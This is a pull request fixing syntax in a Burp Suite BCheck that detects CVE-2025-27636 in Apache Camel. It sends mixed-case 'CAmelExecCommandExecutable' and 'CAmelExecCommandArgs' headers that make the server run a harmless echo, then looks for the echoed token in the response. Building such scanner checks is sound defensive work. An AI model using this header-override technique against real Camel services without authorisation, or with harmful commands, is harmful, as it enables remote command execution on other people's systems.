### PR TITLE
Adding bcheck for Apache Camel vuln

### DIFF
--- a/vulnerabilities-CVEd/CVE-2025-27636 - Apache Camel - Exec override via mixed-case header.bcheck
+++ b/vulnerabilities-CVEd/CVE-2025-27636 - Apache Camel - Exec override via mixed-case header.bcheck
@@ -10,11 +10,11 @@ given path then
   send request called probe:
     method: "GET"
     headers:
-      "CAmelExecCommandExecutable": "echo"
+      "CAmelExecCommandExecutable": "echo",
       "CAmelExecCommandArgs": "BURP-CAMEL-TEST"
 
   # If the response body contains our token, the override worked (vulnerable).
-  if {"BURP-CAMEL-TEST"} in {probe.response.body} then
+  if "BURP-CAMEL-TEST" in {probe.response.body} then
     report issue:
       name: "Apache Camel header injection (CVE-2025-27636) – Exec override via mixed-case header"
       severity: high


### PR DESCRIPTION
### BCheck Contributions

* [x] BCheck compiles and executes as expected
* [x] BCheck contains appropriate metadata (name, version, author, description and appropriate tags)
* [x] Only .bcheck files have been added or modified
* [x] BCheck is in the appropriate folder
* [x] PR contains single or limited number of BChecks (Multiple PRs are preferred)
* [x] BCheck attempts to minimize false positives

As shown, looks like it's working as expected. Can run up the POC environment for ya'll to test to if you want to confirm it's working
<img width="1811" height="685" alt="image" src="https://github.com/user-attachments/assets/c2c3e1d6-2757-419a-b3c1-9368978b4744" />
<img width="907" height="673" alt="image" src="https://github.com/user-attachments/assets/7194cb14-cfd9-4b5b-a214-ed1a623c785a" />


